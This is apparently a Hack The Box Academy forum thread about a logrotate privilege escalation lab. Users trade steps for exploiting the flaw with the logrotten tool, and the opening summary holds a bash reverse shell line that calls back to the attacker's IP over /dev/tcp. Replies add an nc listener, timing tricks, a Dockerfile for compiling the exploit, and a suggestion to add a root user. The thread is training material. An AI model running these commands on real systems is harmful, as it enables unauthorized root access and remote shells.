Linux Privilege Escalation > Logrotate

Summary
  1. create payload => bash -i >& /dev/tcp/10.10.14.10/9001 0>&1
  2. transfer logrotten.c file to the machine
  3. trigger log rotate => echo test > /home/htb-student/backups/access.log
  4. run logrotten => ./logrotten -p ./payload /home/htb-student/backups/access.log
2 Likes

how are we supposed to know that logrotate will rotate the files in the backup folder? ■■■■

i went to check into /etc/logrotate.d/ and found the mon config file, that is set to rotate hourly, in our own /home/htb-student/mon/. created the folder and a mon.log file with some content in it. waited two hours. logrotate didn’t run. LOL. that seemed to be the most “logical” way to follow what’s going on on that box, rather than having to “guess”. not the first time that i find those questions and challenges rather dumb, personally.

1 Like

so yeah. ultimately: pushed pspy (32) on the box, ran it, and saw that logrotate runs every 5 seconds. the conf is at /root/log.conf so can’t read it. hence need to guess which files are rotated, and whether it’s create or compress. long story short the rotated file is at ~/backups/access.log and it’s create. then i echoed some ■■■■ in the file and VERY QUICKLY ran logrotten. if logrotate rotates before lauching logrotten it’s dead. and of course we have to launch logrotten only after we’ve edited the access.log. tried to run some sleep etc. but didn’t work for whatever reason. anyways, after logrotten did its job i had a few second to get the flag from nc listening lol. doesn’t feel that easy.

2 Likes

Did you get it? I have been waiting for nc as well.

1 Like

I have tried many things… but still cannot get the shell… it keeps waiting for rotation…

when you do it it should not say waiting for rotation. you can do a one liner like this “echo test > backups/access.log && ./logrotten -p ./payload ~/backups/access.log” make sure youre pointing at the right files. when it doesnt say rotating and it says “Waiting 1 seconds before writing payload…” thats when you keep spamming the logrotten command (give it like 20 seconds then do it again if it doesnt work) until it can connect to your rev shell

Hello, thanks for your answer! I finally managed :slight_smile:

1 Like

the way i did was:
host machine
nc -lvnp 9012

target:
echo test > /home/htb-student/backups/access.log
ASAP,
./logrotten -p ./shell /home/htb-student/backups/access.log

switch to your host machine and wait few seconds, be prepared to PASTE the command:

cat flag.txt

and copy the flag like a pro.

you only have few seconds to do this, so thats why you have to got the command prepared only to paste it! =D

1 Like

“Sorry, can you clarify a bit on the correct log file and how do I find it? It has to be owned by root and writable to us right?”

htb-student@ubuntu:/tmp$ cat /var/lib/logrotate.status
logrotate state – version 2
“/home/htb-student/backups/access.log” 2024-6-28-13:52:33

just add a root user or change the root password as a payload :wink:

do not use ~ but use the full absolute path instead: /home/htb-student/…

It should be mentioned that there is a logic and configuration problem with the exercise. The logrotate configuration is normally supposed to include the /etc/logrotate.d files, therefore the /home/htb-student/mon/mon.log file:

/home/htb-student/my/my.log {
hourly
rotate 5
notifempty
maxsize 1k
create
}

Logically it would have been enough to create the file /home/htb-student/mon/mon.log, fill the content so that it exceeds 1k, wait 1 hour. But the exploit does not work, because the file is not rotted.

The exercise is poorly done.

You can compile logrotten directly on box
or, as true malware developer, on your machine with oldest glibc version , using Docker

# image with GLIBC-2.31
FROM ubuntu:20.04

# Install gcc and lib for compilation
RUN apt-get update && apt-get install -y \
    gcc \
    libc6-dev \
    && rm -rf /var/lib/apt/lists/*


COPY logrotten.c /logrotten.c

RUN gcc -o logrotten /logrotten.c

CMD ["true"]

and run it

docker build -t glibc-2.31 .
docker run --rm -v "$(pwd)":/output glibc-2.31 /bin/bash -c "cp /logrotten.c /output/logrotten && gcc -o /output/logrotten /output/logrotten.c"
1 Like

Thanks man, your summary helped me a lot.

Just want to be clear and fix your summary.
I triggered the log rotate after I ran the command “/logrotten -p ./payload /home/htb-student/backups/access.log”

And guys, open another terminal of ssh in order to do that fast and be ready to run the “cat flag.txt” command. The root access will be gone fast.

Thanks again

1 Like

I am over 100% sure that this lab does not function properly, this whole lab is simple enough to get the hang of. I was able to catch a rev shell once, every other time nothing else happens, I check the symlinks and there is nothing there.

EDIT: it finally worked, it took at least 25x attempts of running the echo command then the logrotten command as a one liner, it finally worked when I ran them as separate commands very quickly. Annoying lab.